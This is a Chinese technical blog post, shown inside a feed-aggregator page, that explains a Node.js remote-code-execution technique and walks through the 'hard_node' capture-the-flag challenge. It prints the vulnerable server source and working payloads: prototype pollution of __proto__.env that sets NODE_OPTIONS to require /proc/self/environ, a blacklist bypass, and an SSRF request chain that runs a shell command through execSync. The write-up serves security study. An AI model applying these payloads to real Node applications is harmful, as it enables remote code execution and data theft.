惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

The Last Watchdog
The Last Watchdog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
S
Secure Thoughts
MongoDB | Blog
MongoDB | Blog
博客园 - Franky
T
Tor Project blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Google DeepMind News
Google DeepMind News
L
LINUX DO - 最新话题
博客园_首页
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Vercel News
Vercel News
Last Week in AI
Last Week in AI
月光博客
月光博客
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
P
Proofpoint News Feed
博客园 - 叶小钗
NISL@THU
NISL@THU
C
Check Point Blog
K
Kaspersky official blog
N
News and Events Feed by Topic
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
A
Arctic Wolf
T
Threatpost
GbyAI
GbyAI
L
LINUX DO - 热门话题
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
P
Privacy & Cybersecurity Law Blog
N
News and Events Feed by Topic
Scott Helme
Scott Helme
P
Privacy International News Feed
The Register - Security
The Register - Security
G
GRAHAM CLULEY
Recorded Future
Recorded Future
Apple Machine Learning Research
Apple Machine Learning Research
C
Cybersecurity and Infrastructure Security Agency CISA
B
Blog
Project Zero
Project Zero
Cyberwarzone
Cyberwarzone
Webroot Blog
Webroot Blog
Microsoft Security Blog
Microsoft Security Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
D
DataBreaches.Net
J
Java Code Geeks
AWS News Blog
AWS News Blog
Help Net Security
Help Net Security
Engineering at Meta
Engineering at Meta
M
MIT News - Artificial intelligence
T
Threat Research - Cisco Blogs
Google DeepMind News
Google DeepMind News

Yesterday17's Blog

2026 新年解密红包 / Melody Flag | Yesterday17's Blog 谈谈 Iori 的设计思路(二):如何实现一个 Showroom 录制工具? | Yesterday17's Blog 谈谈 Iori 的设计思路(一):从 Nico Timeshift 说起 | Yesterday17's Blog Iori Minyami 0.1.0 发布 | Yesterday17's Blog 2025 新年解密红包 / Melody Flag | Yesterday17's Blog 使用 Cloudflare Warp 解决罗森票务的海外登录问题 | Yesterday17's Blog How To Blog 04: The Astro v5 Era | Yesterday17's Blog 谈谈 tokio::select! 的公平性 | Yesterday17's Blog Learning Pingora 05 - Connect with TLS | Yesterday17's Blog Leaving Bytedance | Yesterday17's Blog 大橋彩香 AsiaTour「Reflection」上海公演 个人向记录 & Repo | Yesterday17's Blog Recoving from burnout - What happened? | Yesterday17 Yubikey 重建手册 | Yesterday17's Blog How To Blog 03: Heimus | Yesterday17's Blog 🪧 Blog Migration Accouncement | Yesterday17's Blog Learn Your IDE - VSCode 是如何仅重启插件的? | Yesterday17's Blog How To Blog 02: Astro❤️Password | Yesterday17's Blog How To Blog 01: Why, How, and the Future | Yesterday17's Blog Learning Pingora 04 - Establish L4 Connection | Yesterday17's Blog Learning Pingora 03 - Upstreams and Peers | Yesterday17's Blog Learning Pingora 02 - A Simple HTTP Server | Yesterday17's Blog Learning Pingora 01 - Getting Started | Yesterday17's Blog 2024 新年解密红包 / Melody Flag | Yesterday17's Blog 向新的一年飞驰——记录 2023 | Yesterday17's Blog 「サクラノ刻」对话选摘(2) | Yesterday17's Blog PGP Key Revocation 注销声明 | Yesterday17's Blog 「サクラノ刻」对话选摘(1) | Yesterday17's Blog 2023 新年解密红包 / Melody Flag | Yesterday17's Blog 『蒼の彼方のフォーリズム』通关感想 | Yesterday17's Blog 单显卡直通教程 | Yesterday17's Blog 对博客与笔记的思考 | Yesterday17's Blog Project Anni 之旅(3)自动化 Flutter 应用 CI/CD 上架流程 | Yesterday17's Blog AsobiStage 直接播放链接 | Yesterday17 如何在后分P时代进行投稿——sswa使用详解 | Yesterday17's Blog JSON RPC 与 LSP 协议基础 | Yesterday17's Blog Grajapa Shueisha / BookEnd 加密方式调查 | Yesterday17's Blog 【2022篇+WriteUp】如何再收一个新年红包? | Yesterday17's Blog 如何将良心云的良心功能清理干净 | Yesterday17's Blog 【油猴脚本】bilibili 投稿页面返回旧版+旧版页面强制允许分P上传 | Yesterday17's Blog Cloudr1v1 授权方式分析 | Yesterday17 Typora 1.0.2 逆向实录 | Yesterday17's Blog Project Anni 之旅(2)ValueAfterTable——toml-rs的实现与限制 | Yesterday17's Blog IPv4透明代理+IPv6 Passthrough——树莓派单臂软路由折腾记 | Yesterday17's Blog Chaos; Child 汉化补丁 神秘编码探索 | Yesterday17's Blog 镣铐与舞蹈——个性与共性之迷思 | Yesterday17's Blog Go 学习笔记 02 - 找准 io 之道 | Yesterday17's Blog NAT Slipstreaming v1 原理浅析 | Yesterday17's Blog 绕过「9-nine-」的 CDKEY 验证——KrkrPlugin 正(?)向实录 | Yesterday17's Blog 静流的青春纪念册——「サクラノ刻 -櫻の森の下を歩む-」体验版感言 | Yesterday17's Blog Project Anni 之旅 01 - 从 clap-builder 到 derive | Yesterday17's Blog [Google CTF 2021] CPP WriteUp | Yesterday17's Blog 获取 アソビステージ 的实际播放链接 | Yesterday17's Blog 90 行 Rust 代码实现 AsyncTeeReader | Yesterday17's Blog 或许还算有价值一读的文章列表 | Yesterday17's Blog 从零开始的 Seedbox 之旅 | Yesterday17's Blog [随笔]技术型博客行文迷思(1) | Yesterday17's Blog 浅谈 git fetch 的工作方式 | Yesterday17's Blog 『ソーサレス*アライヴ! ~the World's End Fallen Star~』通关感想" | Yesterday17's Blog Rust std::fmt 格式语法简述 | Yesterday17's Blog 日亚修改居住国的解决方案 | Yesterday17's Blog [Windows/Linux] GC553 的 Switch 完美采集之路 | Yesterday17's Blog 【翻译】Subtyping and Variance / 子类型与变型 | Yesterday17's Blog Berd's Red Envelope 2021 WriteUp | Yesterday17's Blog 【中英对照】ALSA 音频 API 使用教程/A Tutorial on Using the ALSA Audio API | Yesterday17's Blog 从 cue_scanner.l 看 CUE Sheet 的词法单元 | Yesterday17's Blog Postman 历史记录导出的解决方案 | Yesterday17's Blog 《恋爱绮谭 不存在的夏天》通关感想 | Yesterday17's Blog [微机实验/TD-PITE] 微机接口综合实验 | Yesterday17's Blog [微机实验/TD-PITE] 键盘扫描及数码管显示实验 | Yesterday17's Blog [微机实验/TD-PITE] 数码管显示实验 | Yesterday17's Blog Airsonic Advanced+Google Drive+Caddy 部署纪实 | Yesterday17's Blog X-NUCA 2020 - hellowasm 题解 | Yesterday17's Blog [微机实验/TD-PITE] 8251 串行接口实验 | Yesterday17's Blog EP.01 「夜の向日葵」 | Yesterday17's Blog [微机实验/TD-PITE] 8254 定时/计数器实验+选做实验 | Yesterday17's Blog [JLU CTF/2020] babywasm WriteUp | Yesterday17's Blog PHP 反序列化与经典利用 | Yesterday17's Blog WebAssembly 逆向简述 | Yesterday17's Blog 『彼女、お借りします』一期完结点评 | Yesterday17's Blog [微机实验/TD-PITE] D/A 转换实验+选做实验 | Yesterday17's Blog [微机实验/TD-PITE] A/D 转换实验+选做实验 | Yesterday17's Blog 开源项目申请 JetBrains Open Source License 简单流程 | Yesterday17's Blog 微软拼音与 JetBrains 搜索快捷键冲突的解决方案 | Yesterday17's Blog [微机实验/TD-PITE] 8259 中断优先级实验+选做实验 | Yesterday17's Blog IFTTT 测试(续) | Yesterday17 IFTTT 测试 | Yesterday17's Blog [微机实验/TD-PITE] 存储器扩展实验+选做实验 | Yesterday17's Blog 新版 GCC 针对 -fdump-translation-unit 的替代方案 | Yesterday17's Blog 一次 HSTS 策略配置的排错之旅 | Yesterday17's Blog YukiNative 踩坑记——Windows 的消息队列 | Yesterday17's Blog 我是我自己——论获取 HTTPS 证书时的验证步骤 | Yesterday17's Blog 【设计文档】对 PUG 的大规模设计修订(1.1) | Yesterday17's Blog GS65 折腾记(2)加装固态,分区,Grub2 引导 Manjaro LiveCD | Yesterday17's Blog 「さくら、もゆ。」的空白字体列表——一次逆向问题定位过程实录 | Yesterday17's Blog GSuite 探索篇(1)使用 Service Account 向 Google Drive 传输文件 | Yesterday17's Blog 『サクラノ詩 -櫻の森の上を舞う-』通关感想 | Yesterday17's Blog 《ATRI -My Dear Moments-》通关感想 | Yesterday17's Blog [工具][VSCode 扩展] AegiKit——方便 Aegisub 使用的工具箱 | Yesterday17's Blog 贝塞尔曲线、字体矢量化与曲线运算 | Yesterday17's Blog NAT 类型初探 | Yesterday17's Blog
Node.js child_process.fork 与 env 污染 RCE | Yesterday17's Blog
Yesterday17 · 2020-10-18 · via Yesterday17's Blog

Node 从8.0 开始支持 NODE_OPTIONS,而 Node 的参数中有一项名为 --require,可以加载执行一段 JavaScript 代码。这就是一切的起源。

ToC

  • 当 NODE_OPTIONS 遇到 fork
  • 原型链注入
  • /proc
  • 实战
  • 参考

当 NODE_OPTIONS 遇到 fork

我们先来看一下 child_process.fork 的源码:

function fork(modulePath /* , args, options */) {

validateString(modulePath, "modulePath");

// Get options and args arguments.

let execArgv;

let options = {};

let args = [];

let pos = 1;

if (pos < arguments.length && ArrayIsArray(arguments[pos])) {

args = arguments[pos++];

}

if (

pos < arguments.length &&

(arguments[pos] === undefined || arguments[pos] === null)

) {

pos++;

}

if (pos < arguments.length && arguments[pos] != null) {

if (typeof arguments[pos] !== "object") {

throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]);

}

options = { ...arguments[pos++] };

}

// Prepare arguments for fork:

execArgv = options.execArgv || process.execArgv;

if (execArgv === process.execArgv && process._eval != null) {

const index = execArgv.lastIndexOf(process._eval);

if (index > 0) {

// Remove the -e switch to avoid fork bombing ourselves.

execArgv = execArgv.slice();

execArgv.splice(index - 1, 2);

}

}

args = execArgv.concat([modulePath], args);

if (typeof options.stdio === "string") {

options.stdio = stdioStringToArray(options.stdio, "ipc");

} else if (!ArrayIsArray(options.stdio)) {

// Use a separate fd=3 for the IPC channel. Inherit stdin, stdout,

// and stderr from the parent if silent isn't set.

options.stdio = stdioStringToArray(

options.silent ? "pipe" : "inherit",

"ipc"

);

} else if (!options.stdio.includes("ipc")) {

throw new ERR_CHILD_PROCESS_IPC_REQUIRED("options.stdio");

}

options.execPath = options.execPath || process.execPath;

options.shell = false;

return spawn(options.execPath, args, options);

}

看到第 52 行。当 options 中没有 execPath 中,fork 会尝试使用 process.execPath,也就是 node 本身。如果我们还可以控制 options.env,那就可以在 fork 执行之前先执行一段我们想要执行的代码。

原型链注入

原型链注入是老生长谈的 Node 安全漏洞了。这次,我们需要通过它写入 env,以在 fork 时传入环境变量。

通过注入 __proto__.env,向其中写入:

{

"NODE_OPTIONS": "--require path/to/file.js"

}

我们就可以执行对应的 JavaScript 了。那如果不能借助文件,我们又该怎么办呢?

/proc

通过 /proc/self/environ,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload 修改成下面的形式:

{

"AAAA": "console.log("2333")//",

"NODE_OPTIONS": "--require /proc/self/environ"

}

就可以在 fork 之前向控制台打印出 2333 了。这里的 AAAA 是为了让这条环境变量在 /proc/self/environ 中能显示在最前,而后面的 // 则是为了注释掉之后的内容,防止执行出现问题。AAAA// 的配合使得只有我们希望的代码被执行,提高了破坏力。

实战

这题据 CTFHub 说是 2020 第五空间决赛的 Web 题,名字是 hard_node,在 CTFHub 上可以找到。但 CTFHub 上没给源码,所以这里附一下源码。

const express = require("express");

const bodyParser = require("body-parser");

const proc = require("child_process");

const request = require("request");

const ip = require("ip");

const manage = require("./manage.js");

const path = require("path");

const app = express();

app.use(bodyParser.urlencoded({ extended: true }));

app.use(bodyParser.json());

app.use(express.static(path.join(__dirname, "public")));

//stop hackers

const disallowedKeys = [

"__proto__",

"prototype",

"constructor",

"eval",

"proccess",

"root",

"global",

"exec",

"!",

"fs",

];

function isValidPath(segment) {

disallowedKeys.forEach(evilWord => {

if (segment.toString().indexOf(evilWord) !== -1) {

return false;

}

});

return true;

}

app.post("/add", (req, res) => {

let ip = req.ip;

console.log(ip.m);

if (ip.substr(0, 7) == "::ffff:") {

ip = ip.substr(7);

}

console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`);

if (ip != "127.0.0.1" && ip != server_ip) {

res.status(403).send("Not Edit from Local!");

} else {

if (req.body.userName && req.body.nameVal) {

let username = req.body.userName;

let nameVal = req.body.nameVal;

if (!isValidPath(username) || !isValidPath(nameVal)) {

username = "username";

nameVal = "guest";

}

manage.set(object, username, nameVal);

console.log(ip.k);

console.log(object);

res.send(`

<h1>Edit Success</h1>

<a href="/admin">View Admin Page</a>`);

} else {

res.send("param error");

}

}

});

app.get("/admin", (req, res) => {

if (manage.get(object, "username", "guest") === "admin") {

console.log("Current User:" + object.username);

const child = proc.fork(`${__dirname}/public/user.js`, ["admin"]);

child.on("message", body => {

res.status(200).send(body);

});

child.on("close", (code, signal) => {

console.log(`subproccess ended with ${signal}`);

});

} else {

res.status(403).send("Only Admin Can View this");

}

});

app.get("/getContent", (req, res) => {

res.sendfile(`${__dirname}/public/guest.html`);

});

app.get("/", (req, res) => {

// console.log(req.body)

let uri = req.query.url ? req.query.url : "http://127.0.0.1:3000/getContent";

console.log(uri);

try {

request.get(uri, (err, response, data) => {

if (!err && response.statusCode == 200) {

res.send(data);

} else {

console.log(err);

}

});

} catch (e) {

console.log(e);

} finally {

console.log("Make Server Continue Running");

}

});

var object = { username: "guest" };

var server_ip = ip.address();

app.listen(3002);

console.log(`${server_ip} is starting at port 3000`);

const isObj = require("is-obj");

var manage = {

getPathSegments: function (path) {

const pathArray = path.split(".");

const parts = [];

for (let i = 0; i < pathArray.length; i++) {

let p = pathArray[i];

while (p[p.length - 1] === "\\" && pathArray[i + 1] !== undefined) {

p = p.slice(0, -1);

p += pathArray[++i];

}

parts.push(p);

}

return parts;

},

get: function (object, path, value) {

if (!isObj(object) || typeof path !== "string") {

return value === undefined ? object : value;

}

const pathArray = this.getPathSegments(path);

for (let i = 0; i < pathArray.length; i++) {

if (!Object.prototype.propertyIsEnumerable.call(object, pathArray[i])) {

return value;

}

object = object[pathArray[i]];

if (object === undefined || object === null) {

if (i !== pathArray.length - 1) {

return value;

}

break;

}

}

return object;

},

set: function (object, path, value) {

Object.keys(Object.prototype).forEach(function (Val) {

if (!Object.hasOwnProperty(Val)) {

delete Object.prototype[Val];

console.log(`${Val} is delete`);

}

});

if (!isObj(object) || typeof path !== "string") {

return object;

}

const root = object;

const pathArray = this.getPathSegments(path);

for (let i = 0; i < pathArray.length; i++) {

const p = pathArray[i];

if (!isObj(object[p])) {

object[p] = {};

}

if (i === pathArray.length - 1) {

object[p] = value;

}

object = object[p];

}

return root;

},

};

module.exports = manage;

可以看到,manager.jsset 存在明显的原型链注入,而通过 getPathSegments 又可以以 \\. 的方式绕过黑名单的检测。

我们发现,修改信息只能通过 /add 进行,这里有一个内网限定访问,可以使用 requesthar 来实现:

http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'

然后执行写入要执行的代码:

http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'

最后访问 /admin 就可以了。

(最后从 CTFHub 上把源码偷下来了:https://drive.google.com/file/d/1z6zT48OI7zeUjWwIJvma66_2ZGIMz1M2/view?usp=sharing

参考

  1. https://xz.aliyun.com/t/6755
  2. https://blog.szfszf.top/article/47/
  3. https://github.com/mpgn/CVE-2019-7609